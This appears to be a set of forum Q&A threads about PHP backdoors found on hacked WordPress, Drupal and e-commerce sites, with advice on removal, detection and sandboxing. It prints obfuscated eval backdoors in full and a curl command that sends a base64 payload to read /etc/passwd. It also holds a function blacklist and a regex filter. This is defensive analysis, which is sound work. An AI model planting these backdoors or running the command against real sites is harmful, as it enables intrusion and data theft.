One of my site was hacked last night and some porno content was placed on my site.
What I have done:
I have removed manually the adult content from site by using FTP.
My website is up now and working fine. But, still I am able to find some code in my plugin and theme files. Which was not written by me, Code is as below:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
?>
What my queries are:
What this code stands for, what is this doing?
Is this harmful?
Should I remove this code from my files?
Is this will make any effect on my site if removed?
Other Code Suggestions Required:
This sort of code is available in 100+ files. Is there any method to remove code from all files in once? Or any method to keep code and just make it disinfect? so, it will save my time to remove code manually from too much files.
What this code stands for, what is this doing?
This code is a backdoor which can be used by an attacker to execute arbitrary code. This is what the code intends to do.
<?php
eval( base64_decode( $_POST['n842e1c'] ) );
An attacker can make a post request to this file with his encoded payload in POST parameter n842e1c and execute PHP code.
Example:
curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE
Here this ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs= is the BASE64 encoded string of echo readfile('/etc/passwd');.
Is this harmful?
Yes
Should I remove this code from my files?
Yes
Will this make any effect on my site if removed?
No
Here are some tips to help you clean the website. Also, follow this official post by wordpress to take necessary steps.
It's a backdoor, taking a POST parameter named n842e1c and execute it. Instruction is encoded as Base64.
It is.
You should immediately.
Nothing, remove it asap.
Maybe re-install wordpress, or you could quickly develop a script in python (or something else) to remove this string from your files.
PHP eval is dangerous.
It basically executes the code within it's function. So you must remove it if you are not sure of it's use in your website.
The eval() language construct is very dangerous because it allows
execution of arbitrary PHP code. Its use thus is discouraged. If you
have carefully verified that there is no other option than to use this
construct, pay special attention not to pass any user provided data
into it without properly validating it beforehand.
Source
You can not disable it directly so the only choice is you remove the code from all the files.
Try installing these free plugins on your Website.
Sucuri WordPress Auditing and Theme Authenticity Checker (TAC).
Follow below URLs to get some help.
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/
Related
A friend of mine asked to make some changes to his website. When looking at the code I found every php file had this single line of code. So I had to Decode the string and replace the file with the result. From there I was able to make the proper adjustments to the site.
<?php eval("?>".base64_decode("PD9waHANCglpbmNsdWRlX29uY2UoJ2Z1bmN0aW9ucy5waHAnKTsNCj8+DQo8IURPQ1RZUEUgaHRtbCBQdWJsaWMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0a......=")); ?>
My question is why would someone do such a thing? Doesn't this add an extra process to every page?
He just thought that this may protect the code from being stolen, but that 's wrong off course.
This is the code:
<?php
$mign='*]`Dy6b'^'G';$qxqytq='HFJ01,0=^SG';$tehui='8P1Z}OeJXSbkV.L-zUJ2F#)GYy!JX%Bq';$xepyo='%';$ubs='lgO-2y-C_0AlSYMV_=ybr'^'DEzq9GRU';$zswu=0;##pS9Kg{5F$!S5Yb9Yf?R][|,z
$tjtgc|'ydiewzrbbxpynuhihqways';vukykn;$cqhi='#TQGI8[8:6_L-97'^'F&#(;g)]JY-8DWP65*E/h';$ivcppw='C%;';/*gn/zl_:#Jjsg$&&Sc&R$yakd='lgiwcwijhpuinad';'farustppsomkv';*/$qhn='$/vm$4YTo';$pef='0lb+)(o';$nmpnj='1*]sGZ]MsPYJCY'^'XD4,4?)';$nrohc='(_'^'Lj$5KKm';heag;$koqp=${'o/-dba*MsPYJCY'^$pef};hcel;$bplv=$qxqytq.$xepyo;$nufx='[eR?O}W/aa[^2K(IH7xVpEK"lJBr`CsD';$nmpnj($cqhi,$zswu);$fbbqn='+4/QEIo[+=$Q*JU';##p:YubiF)O0!pzf7wiB+M)gYR$Hy]U4.E,e?
$lku='Ymhp8`2#';/**|)JZV:3-R%EE=o2vK24OG#hmd[x"lGWAVz*/'p[7mlK';/*Yfb#:/h#EX(J-nIJ)A8EI-Y66O-Az|Nx}mZ=N?BIYzwuihjc^/$+9u5$^glt6=Zj+Tvz2d_l^*/'#)}R-xh';mpggm;$cqhi($zswu);##d1_"E4ZRb^z%jk-:v6}#g]#[7hXC"S
$tyz='hK0D3%*W&Yd';mhlamr;/*$xeeq;n3CVH|m}ql#(wi^M074$}UD-#Q58t"hj0n^M-v[zyP|Qjjrxdxl>>$amhg*/$tnzm=$nufx.'_0Isw'^$tehui;##l3X.-o$i[f%^W]v_0/ACZRMU*je.ztj)6gcA
$kgxnh=$bplv.$ivcppw^$fbbqn;'A`tF,G';/*Rs;1%fj1lIw]U#ANT"#zyu"Ef|,=bKasH*"tftelkntqhpcdnf>>es+"Arm"WKVh;aV.1vV^pEu1*/kyrp;$xepyo=$mign.$nrohc;$ctwvbd=$koqp['ksnkhe'];'{kMSjp]';if($tnzm==$xepyo($ctwvbd)/*^A,:q_`6)"5=#GVlbLwsRa&hPR%w3.8S+Nez3g(?Y8:*/){/*PPA2[RC"o9$nz='fmigpxxindhegtxconzwjcto';'zc';*/$fduger='O#*"/59S+F|$F0?!E^AZG`,b0xj:C7YHE#^r6ai7[&2%-=VvoQubf]qrb`9bnbXR)S7ZOtpNqkAK#_(8ocvKR=II#F1;s7lntBNI/Td)lKqWdUZ6Zb1XI`9&3.P"P(vBy??;7{wQ],2:xj7#%0#8DNR;S;|GNVH)25;633!z:Y?*HmXzfdY]WB-^VAJM"VoBk))M$R.ftU0]UY0)B#_{A.2;##]=`U0SX,PU:dFc0"!)R';$wuxhwd='p`LKCPf4N2#G)^KD+*2rc?j+|=9aaR39*#,Pk:KC6VmKLP3T2xUXFy.1-/r++9z7C"X9=V-u{bHo53BBRKW.?M=0hbn}:{)=/`,+J$FtEbQhD33Z?=V==?ZI]Z5L$[^f&yvwr(,s?NWJZ7lbQ]Sg*/?^qfUgtvlvqzt}zvzXX;ZZj0cpom}3?2[$3|(,Q3Yv4ML.K6KNP6B/;pnK#P:MuqV^#L9XHqE?2Vyn0mO#UT#Ez';$mynbq='5XNBz#';$ynbwu^$rgwyx;$xrazo='Afyo-3;*`OjI+H:2sO-dmx5kma05&W+EY/NYq';/*$md;Kh`L(9y#t,NQEDVz*uQ4yV:o+ouD#t^F.qAd!=,2"bmo<<$qtfxzlihia*//*$qlqo;U]y-fa]#JRDD$[-Deeghldc>>$dybre*/
##_W}8|bSK^C#$J..a5:]s(
$sqyh=$vxk^'Kmi0Z=5&8z';/*YLqCs8gylkR?H;m2FlLw*zgfmljzb^&-O9D$5dt#GMfd&|bX-66?0|:4;*/$miqbq=',JjZQwb}"}'.'slady';/*`k"Nn$:|#o`u(8lJ1=Kg=eJ"x0hBU4$w-2|x-wQmo4)/*/
'WMMg';'8aQ;1h5';'fR_fq';'9%=.7ho';$aizt='bwjHYJJjot;;7lV}$dkVt';$upnyd^$yxzz;'_t0z$%';##=i=w?3mV5s)K/O#f_IU^5WTG"tS!/
$wdfnl=$mynrf.'t09}/UKf)k+VFC0N';/*[#Y0Y#pi4D%z%4Q1cJC*^aa^vY/bFLxpuwccni|mM|$",j5^jh#DY=m^7tL_&:{hX*/$cbarg='9"6G,K/UMq?GLO5rYT'.$uagz;$buu='KopKNAID]gK,F8NK[kr"$4p86CU_W8H7{rgpQ'.$fduger;
$kjkrf='E_pbB/iZlx';/*-Awooy^1]c-(a#j}=%,mHJqwgix|ehj(CsHUTrSW8OCn_Zz8Roj}9Q;xCf4%2]QgzL*/$umjxo=$xrazo.$wuxhwd;$koe='SD##5j/Tk=BNek&h';$nsj='9"6G,K/UMq?GLO5rYT'^$mcoe;$pjzk^':nBjE7';$buu.='aZ:0S%=X#w3';$whql=$buu.'6XWi9EiMc4'^$umjxo.'E4R#%_Xq{}:';/*$ow;zNW(]WrX7]XYnidtdxia<<$oxbxywv*/
$ojg='bO8rU(2Vd{HSGS!';$zqs='Ce}/q+z"y?]Tex'.'3#?I6Rn]UOc&T)uj';'6XWi9EiMc4';'JUVtY+Ub1iqI3{9';$odoiv=$odoiv.'*u|0eGu-Pe=WOd+g95sZZ8|V%L';$fbu=$fbu.';U;HZ"D[d0H2J.#';/*MPm}M}!Qb5`Xx{(h4N0o2F&5;;d{WeMQ(EDH#&B8}r.ciz#g"dLFtObo)DzJp4l%[4CHp%[]Z*/$dwl=$kgxnh($qpm,$whql);$dwl('$h&"3Z%MPDm)/(l:My"%CK,${)CW+#P[','9BeCi=uox');}$zfqa('{Hg"G2','?Zt/{2T');plktjco;':4_epeN(-EHY7!L5OzSpm(^TnX';'iV(!{?d$V.';$kedr('-.sGVZ_B4`0');
$flzrk($qmdr,$nnxk);txzpdre;##pfE/}Mg{S.^"Ry]O|2PK?ulW
$ryy='q0ht#';##rt3I]{hp6$AWo7yb#|xKCPo?VBY$[{[
$lg='|.,oBa';/*]z1O/!V+rf$8rqj98`PLT7?js;%wvisxjbed|!J[cG;Zf)Jw[Qv}g4T3E&=}*/
/*[SXl3i[#y?,d2m3:H?7j8n9?iPslC.5_f`[:z_$sqx='jttsry';'ojty';*/'*iAvU|(bNJ_1';
?>
I've tried figuring out what it means or what it's trying to do, but I think it might be a bit over my head. Can anyone tell me if this is in fact a malicious backdoor script that founds it's way onto the server?
UPDATE
I found this code in sites/default/files in a drupal installation. Luckily you can't execute PHP from that folder, but it means a "normal" or "anonymous" user tried to upload this.
It is malicious alright, however it dynamically evaluates code supplied by the browser so we cannot determine what has been executed against it. It is possible it was using in a file include attack so being able to execute php in it's stored location matters little.
At my company, we have a problem with most eCommerce software like osCommerce and OpenCart and some content management sites like Wordpress or Joomla!.
This is the code we find in, pretty much, every footer.php, header.php and index.php file in some of the sites my company is running on a 3rd-party hosting company.
PHP injection code sample
Giving it a thought... isn't it possible to have a regex for detecting this particular piece of code? It's exactly the same pattern found on some pages, without variation, so I think a pattern-matching algorithm or a search-and-replace method would be the best candidate to help us (apart from a good security audit, which we're actually running with one of Spain's top auditing companies).
Can you give me a hint on what method could we use for such detection and removal pattern?
I wouldn't use an automated process on something so critical. I would want a human to check each file specifically as part of the removal.
Just search for that base64 string? aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==
It decodes to: hxxp://browserglobalstat.com/statD/stat.php (don't go there!!) so it's probably always the same string.
I'm allowing users to embed content from youtube, vimeo, scribd, flickr, slideshare, etc. and therefore i'm allowing them to paste the embed code in a textbox.
I'm having a hard time figuring out how to:
(a) validate that its indeed a correctly formed embed code and
(b) whether its not any malicious code that the user is trying to get my
system to display.
This is a php website.
I've used htmlpurifier in the past. There are some others, but this one worked the best for me. You can whitelist all allowed code constructs and make the html code standard compliant. It's a good first line of defense against XXS attacks.
The library is quite big and can slow down your code if you don't install it correctly, so read the install docs carefully.
We will be implementing a system where we ask the user to specify the direct URL and we go and subsequently fetch appropriate data from that page.
We have a CMS editor where php is allowed to be used inside it, however we need to restrict access some commands such as file_get_contents, file(), and global.
Can someone help me with a boolean response regex for that? The text from the template is stored in a string.
I know, probably not an ideal method for this but it's all I can come up with for now :)
What you want to do is pretty much impossible. It is really hard to protect yourself against attacks if you allow people to execute code on your machine.
Here is the try I had on it: Sandbox. Source code.
What it does is basically maintain a large list of blacklisted functions for filesystem access, shell access, a.s.o (I allowed some functions for reading the filesystem like show_source that should not be allowed if you want to use it for something real.)
It also tries to protect from more hidden attacks like $func = 'unlink'; $func(__FILE__); by turning it into $func = 'unlink'; ${'___xyz'.!$___xyz=Sandbox::checkVarFunction($func)}(__FILE__) a.s.o.
PS: Still you probably don't want to allow people to run PHP code on your site. The risk is just by far too big. Instead I would allow people to use a templateing language inside the editor. A good candidate would be Twig, because it has a built in sandbox which allows you to restrict usage to certain tags, functions, ...
It's going to be very hard to protect yourself perfectly.
As I see it, you have a few options:
Search for predefined strings which is not allowed in your content (like file_get_contents) and display a error message saying that the user cannot save because of this. This will however lead to "hacks" where you'll end up searching for all possible characters, like () which can be valid in some cases.
Use token_get_all and try to parse the content as PHP. You can then loop through the whole source code, token by token, and see if you find a token you do not accept.
Write your own language or DSL for this. This language should only be capable of doing exactly what you want. Depending on your requirements, this can be the easiest and most maintainable way to go.
You can use preg_match for this. Use:
if(preg_match("#(file_get_contents|file)\(#i",$text))